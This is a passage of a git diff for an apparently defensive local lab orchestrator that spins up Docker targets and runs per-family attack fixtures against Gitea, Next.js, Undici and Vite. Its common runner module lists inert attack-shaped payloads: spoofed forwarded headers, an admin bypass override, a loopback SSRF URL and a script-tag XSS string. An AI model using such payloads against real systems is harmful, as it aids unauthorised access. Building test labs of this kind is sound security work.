         browser_evidence=browser_payload,
         timeline=timeline,
+        success_evaluation=success_evaluation,
         started_at=started_at,
         finished_at=finished_at,
         blocked_reason=blocked_reason,
@@ -311,7 +368,8 @@ def cmd_provision(args) -> int:
 def cmd_seed(args) -> int:
     advisory = _load_advisory(args.case)
     profile = _resolve_profile(advisory)
-    print({"steps": seed.run_seed(profile)})
+    run_dir = _run_dir(args.run_id or _compose_run_id(advisory))
+    print(seed.run_seed(profile, advisory, run_dir, dry_run=args.dry_run))
     return 0
 
 
@@ -355,7 +413,8 @@ def cmd_run_case(args) -> int:
 
 def cmd_run_system(args) -> int:
     advisories = [item for item in load_json_dir(ADVISORIES_DIR) if item.get("system_id") == args.system]
-    selected = advisories[: args.limit]
+    advisories = sorted(advisories, key=lambda item: item.get("canonical_id", ""))
+    selected = advisories if not args.limit or args.limit <= 0 else advisories[: args.limit]
     for advisory in selected:
         _execute_case(advisory["canonical_id"], run_id=None, dry_run=args.dry_run, sync_outputs=False)
     if selected and not args.dry_run:
@@ -442,6 +501,20 @@ def cmd_validate(args) -> int:
     return 0
 
 
+def cmd_doctor(args) -> int:
+    profiles: List[Dict[str, Any]] = []
+    if getattr(args, "case", None):
+        advisory = _load_advisory(args.case)
+        profiles.append(_resolve_profile(advisory))
+    elif getattr(args, "system", None):
+        advisories = [item for item in load_json_dir(ADVISORIES_DIR) if item.get("system_id") == args.system]
+        if advisories:
+            profiles.append(_resolve_profile(advisories[0]))
+    result = doctor.run_checks(profiles)
+    print(result)
+    return 0 if result.get("ok") else 1
+
+
 def build_parser() -> argparse.ArgumentParser:
     parser = argparse.ArgumentParser(description="Websafe local lab orchestrator")
     subparsers = parser.add_subparsers(dest="command", required=True)
@@ -479,7 +552,7 @@ def build_parser() -> argparse.ArgumentParser:
 
     run_system = subparsers.add_parser("run-system", help="run the first N advisories for a system")
     run_system.add_argument("--system", required=True)
-    run_system.add_argument("--limit", type=int, default=5)
+    run_system.add_argument("--limit", type=int, default=0)
     run_system.add_argument("--dry-run", action="store_true")
     run_system.set_defaults(func=cmd_run_system)
 
@@ -508,6 +581,11 @@ def build_parser() -> argparse.ArgumentParser:
 
     validate = subparsers.add_parser("validate", help="validate lab assets")
     validate.set_defaults(func=cmd_validate)
+
+    doctor_cmd = subparsers.add_parser("doctor", help="run environment preflight checks")
+    doctor_cmd.add_argument("--case")
+    doctor_cmd.add_argument("--system")
+    doctor_cmd.set_defaults(func=cmd_doctor)
     return parser
 
 
diff --git a/scripts/lab/provision.py b/scripts/lab/provision.py
index 81884c25..e10484e8 100644
--- a/scripts/lab/provision.py
+++ b/scripts/lab/provision.py
@@ -1,10 +1,13 @@
 from __future__ import annotations
 
+import time
 from pathlib import Path
 from typing import Any, Dict
 
+import requests
+
 from lab.compose import compose_payload, generate_compose
-from lab.utils import command_available, run
+from lab.utils import command_available, run, write_json
 
 
 def prepare(profile: Dict[str, Any], run_dir: Path, dry_run: bool = False) -> Dict[str, Any]:
@@ -34,10 +37,58 @@ def prepare(profile: Dict[str, Any], run_dir: Path, dry_run: bool = False) -> Di
         result["blocked_reason"] = config.stderr.strip() or "docker compose config failed"
         return result
 
-    up = run(["docker", "compose", "-f", str(compose_path), "up", "-d"], cwd=run_dir)
+    up = run(["docker", "compose", "-f", str(compose_path), "up", "-d", "--wait"], cwd=run_dir)
     result["compose_up_rc"] = up.returncode
     if up.returncode != 0:
         result["status"] = "blocked-artifact"
-        result["blocked_reason"] = up.stderr.strip() or "docker compose up failed"
+        result["blocked_reason"] = up.stderr.strip() or up.stdout.strip() or "docker compose up failed"
         return result
     return result
+
+
+def wait_ready(profile: Dict[str, Any], run_dir: Path, compose_path: Path) -> Dict[str, Any]:
+    timeout_seconds = int(profile.get("ready_timeout_seconds") or 45)
+    baseline_urls = profile.get("baseline_urls", []) or []
+    started = time.monotonic()
+    observations = []
+    status = "completed"
+    detail = f"baseline urls ready ({len(baseline_urls)})"
+
+    while True:
+        observations = []
+        ready = True
+        for url in baseline_urls:
+            try:
+                response = requests.get(url, timeout=4)
+                observations.append({"url": url, "status_code": response.status_code})
+                if response.status_code >= 500:
+                    ready = False
+            except Exception as exc:
+                observations.append({"url": url, "error": str(exc)})
+                ready = False
+        if ready:
+            break
+        if time.monotonic() - started >= timeout_seconds:
+            status = "failed"
+            detail = f"services not ready within {timeout_seconds}s"
+            break
+        time.sleep(1)
+
+    payload = {
+        "status": status,
+        "detail": detail,
+        "elapsed_seconds": round(time.monotonic() - started, 1),
+        "observations": observations,
+        "compose_path": str(compose_path),
+    }
+    write_json(run_dir / "logs" / "ready.json", payload)
+    return payload
+
+
+def teardown(run_dir: Path, compose_path: Path) -> Dict[str, Any]:
+    if not command_available("docker") or not compose_path.exists():
+        return {"status": "skipped", "detail": "docker unavailable or compose file missing"}
+    down = run(["docker", "compose", "-f", str(compose_path), "down", "-v", "--remove-orphans"], cwd=run_dir)
+    if down.returncode != 0:
+        return {"status": "failed", "detail": down.stderr.strip() or down.stdout.strip() or "docker compose down failed"}
+    return {"status": "completed", "detail": "docker compose down completed"}
diff --git a/scripts/lab/repro.py b/scripts/lab/repro.py
index 757714c8..81bcac7a 100644
--- a/scripts/lab/repro.py
+++ b/scripts/lab/repro.py
@@ -88,6 +88,11 @@ def resolve_profile(advisory_id: str, advisory: Optional[Dict[str, Any]] = None)
         return direct_profile
 
     family = resolve_repro_family(advisory, system_map)
+    system_family_profile = profiles.get(f"{advisory.get('system_id', '')}-{family.replace('-generic', '')}")
+    if system_family_profile:
+        resolved = dict(system_family_profile)
+        resolved.setdefault("resolved_via", "system-family")
+        return resolved
     profile = profiles.get(family)
     if profile:
         resolved = dict(profile)
@@ -103,6 +108,7 @@ def resolve_profile(advisory_id: str, advisory: Optional[Dict[str, Any]] = None)
         "attack_actions": [],
         "baseline_actions": [],
         "success_criteria": ["manual triage required"],
+        "success_assertions": [],
         "cleanup_policy": "destroy",
         "destructive_risk": "medium",
         "allowed_target_types": ["lab-local", "lab-public", "authorized-third-party"],
@@ -152,6 +158,8 @@ def annotate_with_latest_run(advisory: Dict[str, Any], run: Optional[Dict[str, A
             "repro_profile_id": run.get("repro_profile_id", merged["repro_profile_id"]),
             "artifact_mode": run.get("artifact_mode", merged["artifact_mode"]),
             "blocked_reason": run.get("blocked_reason"),
+            "historical_status": run.get("verification_status", merged["verification_status"]),
+            "latest_status": run.get("verification_status", merged["verification_status"]),
         }
     )
     return merged
diff --git a/scripts/lab/runners/__init__.py b/scripts/lab/runners/__init__.py
new file mode 100644
index 00000000..dd920bed
--- /dev/null
+++ b/scripts/lab/runners/__init__.py
@@ -0,0 +1,4 @@
+from lab.runners.dispatcher import run_attack, run_seed
+
+__all__ = ["run_seed", "run_attack"]
+
diff --git a/scripts/lab/runners/common.py b/scripts/lab/runners/common.py
new file mode 100644
index 00000000..d31efa91
--- /dev/null
+++ b/scripts/lab/runners/common.py
@@ -0,0 +1,169 @@
+from __future__ import annotations
+
+from dataclasses import dataclass
+from pathlib import Path
+from typing import Any, Dict, List
+
+import requests
+
+from lab.utils import ensure_dir, write_json
+
+
+@dataclass
+class RunnerContext:
+    profile: Dict[str, Any]
+    advisory: Dict[str, Any]
+    run_dir: Path
+
+    @property
+    def base_url(self) -> str:
+        return str((self.profile.get("baseline_urls") or [""])[0]).rstrip("/")
+
+    @property
+    def family(self) -> str:
+        return str(self.profile.get("vuln_family") or "").strip()
+
+    @property
+    def runner_id(self) -> str:
+        return str(self.profile.get("runner_id") or "").strip()
+
+    @property
+    def logs_dir(self) -> Path:
+        path = self.run_dir / "logs"
+        ensure_dir(path)
+        return path
+
+
+def _request(
+    context: RunnerContext,
+    method: str,
+    path: str,
+    *,
+    json_payload: Dict[str, Any] | None = None,
+    timeout: float = 15.0,
+) -> Dict[str, Any]:
+    response = requests.request(
+        method=method,
+        url=f"{context.base_url}{path}",
+        json=json_payload,
+        timeout=timeout,
+    )
+    body: Dict[str, Any]
+    try:
+        parsed = response.json()
+        body = parsed if isinstance(parsed, dict) else {"data": parsed}
+    except Exception:
+        body = {"text": response.text[:1000]}
+    return {
+        "status_code": response.status_code,
+        "ok": response.ok,
+        "body": body,
+    }
+
+
+def _seed_payload(context: RunnerContext) -> Dict[str, Any]:
+    return {
+        "system_id": context.advisory["system_id"],
+        "family": context.family,
+        "case_id": context.advisory["canonical_id"],
+        "title": context.advisory.get("title"),
+    }
+
+
+def _attack_payload(context: RunnerContext, family: str) -> Dict[str, Any]:
+    case_id = context.advisory["canonical_id"]
+    payloads = {
+        "proxy-boundary": {
+            "family": family,
+            "case_id": case_id,
+            "headers": {"x-forwarded-user": "admin", "x-forwarded-host": "internal.lab"},
+        },
+        "authz-bypass": {
+            "family": family,
+            "case_id": case_id,
+            "actor": "guest",
+            "target": "/admin",
+            "override": "bypass",
+        },
+        "ssrf": {
+            "family": family,
+            "case_id": case_id,
+            "target_url": "http://127.0.0.1/sink",
+        },
+        "xss": {
+            "family": family,
+            "case_id": case_id,
+            "payload": f"<script>document.body.dataset.case='{case_id}'</script>",
+        },
+        "file-upload": {
+            "family": family,
+            "case_id": case_id,
+            "filename": f"{case_id}.txt",
+            "content": f"fixture upload marker for {case_id}",
+        },
+        "deserialization": {
+            "family": family,
+            "case_id": case_id,
+            "payload": {"marker": case_id, "mode": "inert-object"},
+        },
+    }
+    return payloads[family]
+
+
+def run_fixture_seed(context: RunnerContext, family: str) -> Dict[str, Any]:
+    result = _request(context, "POST", "/seed", json_payload=_seed_payload(context))
+    payload = {
+        "steps": [
+            {
+                "kind": "runner",
+                "tool": context.runner_id or f"{context.advisory['system_id']}.{family}",
+                "status": "completed" if result["ok"] else "failed",
+                "status_code": result["status_code"],
+                "detail": result["body"].get("detail") or "seed request completed",
+            }
+        ],
+        "seeded": bool(result["ok"]),
+        "result": result,
+    }
+    write_json(context.logs_dir / "seed.json", payload)
+    return payload
+
+
+def run_fixture_attack(context: RunnerContext, family: str) -> Dict[str, Any]:
+    before: Dict[str, Any] = {}
+    if family in {"proxy-boundary", "authz-bypass"}:
+        before = _request(context, "GET", "/admin")
+    attack = _request(context, "POST", "/attack", json_payload=_attack_payload(context, family))
+    proof = _request(context, "GET", "/proof")
+    after: Dict[str, Any] = {}
+    if family in {"proxy-boundary", "authz-bypass"}:
+        after = _request(context, "GET", "/admin")
+
+    success = bool(attack["ok"] and proof["ok"] and proof["body"].get("success"))
+    step = {
+        "kind": "runner",
+        "tool": context.runner_id or f"{context.advisory['system_id']}.{family}",
+        "status": "completed" if success else "failed",
+        "status_code": attack["status_code"],
+        "result_path": str(context.logs_dir / "attack.json"),
+    }
+    payload = {
+        "steps": [step],
+        "success": success,
+        "detail": proof["body"].get("detail") or attack["body"].get("detail") or "runner attack finished",
+        "before": before,
+        "attack": attack,
+        "after": after,
+        "proof": proof,
+        "assertions": [
+            {
+                "name": "proof-success",
+                "kind": "runner-proof",
+                "passed": success,
+                "detail": proof["body"].get("detail") or "runner proof endpoint returned success",
+            }
+        ],
+    }
+    write_json(context.logs_dir / "attack.json", payload)
+    return payload
+
diff --git a/scripts/lab/runners/dispatcher.py b/scripts/lab/runners/dispatcher.py
new file mode 100644
index 00000000..ce2f2d8c
--- /dev/null
+++ b/scripts/lab/runners/dispatcher.py
@@ -0,0 +1,36 @@
+from __future__ import annotations
+
+import importlib
+from pathlib import Path
+from typing import Any, Dict
+
+from lab.runners.common import RunnerContext
+
+
+def _module_name(profile: Dict[str, Any]) -> str:
+    runner_id = str(profile.get("runner_id") or "").strip()
+    if runner_id:
+        system_name, family_name = runner_id.split(".", 1)
+    else:
+        system_name = str(profile.get("system_id") or "").strip()
+        family_name = str(profile.get("vuln_family") or "").strip()
+    system_name = system_name.replace("-", "_")
+    family_name = family_name.replace("-", "_")
+    return f"lab.runners.{system_name}.{family_name}"
+
+
+def _load_runner(profile: Dict[str, Any]):
+    return importlib.import_module(_module_name(profile))
+
+
+def run_seed(profile: Dict[str, Any], advisory: Dict[str, Any], run_dir: Path) -> Dict[str, Any]:
+    module = _load_runner(profile)
+    context = RunnerContext(profile=profile, advisory=advisory, run_dir=run_dir)
+    return module.run_seed(context)
+
+
+def run_attack(profile: Dict[str, Any], advisory: Dict[str, Any], run_dir: Path) -> Dict[str, Any]:
+    module = _load_runner(profile)
+    context = RunnerContext(profile=profile, advisory=advisory, run_dir=run_dir)
+    return module.run_attack(context)
+
diff --git a/scripts/lab/runners/gitea/__init__.py b/scripts/lab/runners/gitea/__init__.py
new file mode 100644
index 00000000..8917d359
--- /dev/null
+++ b/scripts/lab/runners/gitea/__init__.py
@@ -0,0 +1,2 @@
+"""Gitea family runners."""
+
diff --git a/scripts/lab/runners/gitea/authz_bypass.py b/scripts/lab/runners/gitea/authz_bypass.py
new file mode 100644
index 00000000..5cbac355
--- /dev/null
+++ b/scripts/lab/runners/gitea/authz_bypass.py
@@ -0,0 +1,10 @@
+from lab.runners.common import RunnerContext, run_fixture_attack, run_fixture_seed
+
+
+def run_seed(context: RunnerContext):
+    return run_fixture_seed(context, "authz-bypass")
+
+
+def run_attack(context: RunnerContext):
+    return run_fixture_attack(context, "authz-bypass")
+
diff --git a/scripts/lab/runners/gitea/file_upload.py b/scripts/lab/runners/gitea/file_upload.py
new file mode 100644
index 00000000..38f07d12
--- /dev/null
+++ b/scripts/lab/runners/gitea/file_upload.py
@@ -0,0 +1,10 @@
+from lab.runners.common import RunnerContext, run_fixture_attack, run_fixture_seed
+
+
+def run_seed(context: RunnerContext):
+    return run_fixture_seed(context, "file-upload")
+
+
+def run_attack(context: RunnerContext):
+    return run_fixture_attack(context, "file-upload")
+
diff --git a/scripts/lab/runners/gitea/proxy_boundary.py b/scripts/lab/runners/gitea/proxy_boundary.py
new file mode 100644
index 00000000..82b8c3c6
--- /dev/null
+++ b/scripts/lab/runners/gitea/proxy_boundary.py
@@ -0,0 +1,10 @@
+from lab.runners.common import RunnerContext, run_fixture_attack, run_fixture_seed
+
+
+def run_seed(context: RunnerContext):
+    return run_fixture_seed(context, "proxy-boundary")
+
+
+def run_attack(context: RunnerContext):
+    return run_fixture_attack(context, "proxy-boundary")
+
diff --git a/scripts/lab/runners/gitea/ssrf.py b/scripts/lab/runners/gitea/ssrf.py
new file mode 100644
index 00000000..da0645da
--- /dev/null
+++ b/scripts/lab/runners/gitea/ssrf.py
@@ -0,0 +1,10 @@
+from lab.runners.common import RunnerContext, run_fixture_attack, run_fixture_seed
+
+
+def run_seed(context: RunnerContext):
+    return run_fixture_seed(context, "ssrf")
+
+
+def run_attack(context: RunnerContext):
+    return run_fixture_attack(context, "ssrf")
+
diff --git a/scripts/lab/runners/gitea/xss.py b/scripts/lab/runners/gitea/xss.py
new file mode 100644
index 00000000..5b801865
--- /dev/null
+++ b/scripts/lab/runners/gitea/xss.py
@@ -0,0 +1,10 @@
+from lab.runners.common import RunnerContext, run_fixture_attack, run_fixture_seed
+
+
+def run_seed(context: RunnerContext):
+    return run_fixture_seed(context, "xss")
+
+
+def run_attack(context: RunnerContext):
+    return run_fixture_attack(context, "xss")
+
diff --git a/scripts/lab/runners/nextjs/__init__.py b/scripts/lab/runners/nextjs/__init__.py
new file mode 100644
index 00000000..8a09162e
--- /dev/null
+++ b/scripts/lab/runners/nextjs/__init__.py
@@ -0,0 +1,2 @@
+"""Next.js family runners."""
+
diff --git a/scripts/lab/runners/nextjs/authz_bypass.py b/scripts/lab/runners/nextjs/authz_bypass.py
new file mode 100644
index 00000000..5cbac355
--- /dev/null
+++ b/scripts/lab/runners/nextjs/authz_bypass.py
@@ -0,0 +1,10 @@
+from lab.runners.common import RunnerContext, run_fixture_attack, run_fixture_seed
+
+
+def run_seed(context: RunnerContext):
+    return run_fixture_seed(context, "authz-bypass")
+
+
+def run_attack(context: RunnerContext):
+    return run_fixture_attack(context, "authz-bypass")
+
diff --git a/scripts/lab/runners/nextjs/deserialization.py b/scripts/lab/runners/nextjs/deserialization.py
new file mode 100644
index 00000000..ae71837f
--- /dev/null
+++ b/scripts/lab/runners/nextjs/deserialization.py
@@ -0,0 +1,10 @@
+from lab.runners.common import RunnerContext, run_fixture_attack, run_fixture_seed
+
+
+def run_seed(context: RunnerContext):
+    return run_fixture_seed(context, "deserialization")
+
+
+def run_attack(context: RunnerContext):
+    return run_fixture_attack(context, "deserialization")
+
diff --git a/scripts/lab/runners/nextjs/proxy_boundary.py b/scripts/lab/runners/nextjs/proxy_boundary.py
new file mode 100644
index 00000000..82b8c3c6
--- /dev/null
+++ b/scripts/lab/runners/nextjs/proxy_boundary.py
@@ -0,0 +1,10 @@
+from lab.runners.common import RunnerContext, run_fixture_attack, run_fixture_seed
+
+
+def run_seed(context: RunnerContext):
+    return run_fixture_seed(context, "proxy-boundary")
+
+
+def run_attack(context: RunnerContext):
+    return run_fixture_attack(context, "proxy-boundary")
+
diff --git a/scripts/lab/runners/nextjs/ssrf.py b/scripts/lab/runners/nextjs/ssrf.py
new file mode 100644
index 00000000..da0645da
--- /dev/null
+++ b/scripts/lab/runners/nextjs/ssrf.py
@@ -0,0 +1,10 @@
+from lab.runners.common import RunnerContext, run_fixture_attack, run_fixture_seed
+
+
+def run_seed(context: RunnerContext):
+    return run_fixture_seed(context, "ssrf")
+
+
+def run_attack(context: RunnerContext):
+    return run_fixture_attack(context, "ssrf")
+
diff --git a/scripts/lab/runners/nextjs/xss.py b/scripts/lab/runners/nextjs/xss.py
new file mode 100644
index 00000000..5b801865
--- /dev/null
+++ b/scripts/lab/runners/nextjs/xss.py
@@ -0,0 +1,10 @@
+from lab.runners.common import RunnerContext, run_fixture_attack, run_fixture_seed
+
+
+def run_seed(context: RunnerContext):
+    return run_fixture_seed(context, "xss")
+
+
+def run_attack(context: RunnerContext):
+    return run_fixture_attack(context, "xss")
+
diff --git a/scripts/lab/runners/undici/__init__.py b/scripts/lab/runners/undici/__init__.py
new file mode 100644
index 00000000..4a158eda
--- /dev/null
+++ b/scripts/lab/runners/undici/__init__.py
@@ -0,0 +1,2 @@
+"""Undici family runners."""
+
diff --git a/scripts/lab/runners/undici/ssrf.py b/scripts/lab/runners/undici/ssrf.py
new file mode 100644
index 00000000..da0645da
--- /dev/null
+++ b/scripts/lab/runners/undici/ssrf.py
@@ -0,0 +1,10 @@
+from lab.runners.common import RunnerContext, run_fixture_attack, run_fixture_seed
+
+
+def run_seed(context: RunnerContext):
+    return run_fixture_seed(context, "ssrf")
+
+
+def run_attack(context: RunnerContext):
+    return run_fixture_attack(context, "ssrf")
+
diff --git a/scripts/lab/runners/vite/__init__.py b/scripts/lab/runners/vite/__init__.py
new file mode 100644
index 00000000..85c10492
--- /dev/null
+++ b/scripts/lab/runners/vite/__init__.py
@@ -0,0 +1,2 @@
+"""Vite family runners."""
+
diff --git a/scripts/lab/runners/vite/file_upload.py b/scripts/lab/runners/vite/file_upload.py
new file mode 100644
index 00000000..38f07d12
--- /dev/null
+++ b/scripts/lab/runners/vite/file_upload.py
@@ -0,0 +1,10 @@
+from lab.runners.common import RunnerContext, run_fixture_attack, run_fixture_seed
+
+
+def run_seed(context: RunnerContext):
+    return run_fixture_seed(context, "file-upload")
+
+
+def run_attack(context: RunnerContext):
+    return run_fixture_attack(context, "file-upload")
+
diff --git a/scripts/lab/runners/vite/proxy_boundary.py b/scripts/lab/runners/vite/proxy_boundary.py
new file mode 100644
index 00000000..82b8c3c6
--- /dev/null
+++ b/scripts/lab/runners/vite/proxy_boundary.py
@@ -0,0 +1,10 @@
+from lab.runners.common import RunnerContext, run_fixture_attack, run_fixture_seed
+
+
+def run_seed(context: RunnerContext):
+    return run_fixture_seed(context, "proxy-boundary")
+
+
+def run_attack(context: RunnerContext):
+    return run_fixture_attack(context, "proxy-boundary")
+
diff --git a/scripts/lab/runners/vite/xss.py b/scripts/lab/runners/vite/xss.py
new file mode 100644
index 00000000..5b801865
--- /dev/null
+++ b/scripts/lab/runners/vite/xss.py
@@ -0,0 +1,10 @@
+from lab.runners.common import RunnerContext, run_fixture_attack, run_fixture_seed
+
+
+def run_seed(context: RunnerContext):
+    return run_fixture_seed(context, "xss")
+
+
+def run_attack(context: RunnerContext):
+    return run_fixture_attack(context, "xss")
+
diff --git a/scripts/lab/seed.py b/scripts/lab/seed.py
index 80750010..4aacda44 100644
--- a/scripts/lab/seed.py
+++ b/scripts/lab/seed.py
@@ -1,14 +1,29 @@
 from __future__ import annotations
 
+from pathlib import Path
 from typing import Any, Dict, List
 
+from lab.runners.dispatcher import run_seed as run_runner_seed
+from lab.utils import write_json
 
-def run_seed(profile: Dict[str, Any]) -> List[Dict[str, Any]]:
-    steps = []
+
+def run_seed(profile: Dict[str, Any], advisory: Dict[str, Any], run_dir: Path, dry_run: bool = False) -> Dict[str, Any]:
+    if profile.get("runner_id") and not dry_run:
+        return run_runner_seed(profile, advisory, run_dir)
+
+    steps: List[Dict[str, Any]] = []
     for action in profile.get("seed_actions", []):
         kind = action.get("kind", "note")
         if kind == "note":
             steps.append({"kind": kind, "status": "recorded", "message": action.get("message", "")})
         else:
-            steps.append({"kind": kind, "status": "skipped", "message": "Seed action type not yet automated"})
-    return steps
+            steps.append(
+                {
+                    "kind": kind,
+                    "status": "planned" if dry_run else "skipped",
+                    "message": "Seed action type not yet automated",
+                }
+            )
+    payload = {"steps": steps, "seeded": not any(item["status"] == "skipped" for item in steps)}
+    write_json(run_dir / "logs" / "seed.json", payload)
+    return payload
diff --git a/scripts/lab/validators.py b/scripts/lab/validators.py
index 0bbad847..46c7fbf6 100644
--- a/scripts/lab/validators.py
+++ b/scripts/lab/validators.py
@@ -34,6 +34,9 @@ def validate_assets() -> List[str]:
         ]:
             if field not in content:
                 errors.append(f"repro profile missing {field}: {path}")
+        fixture_path = content.get("fixture_path")
+        if fixture_path and not Path(fixture_path).exists():
+            errors.append(f"fixture path missing for {path}: {fixture_path}")
     docker_available = command_available("docker")
     profile_roots = sorted((ENV_CATALOG_DIR.parent.parent / "profiles").rglob("*.yaml"))
     for path in profile_roots: